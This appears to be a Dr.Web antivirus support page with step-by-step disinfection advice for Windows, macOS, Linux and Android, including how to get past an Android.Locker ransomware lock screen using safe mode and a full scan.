  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android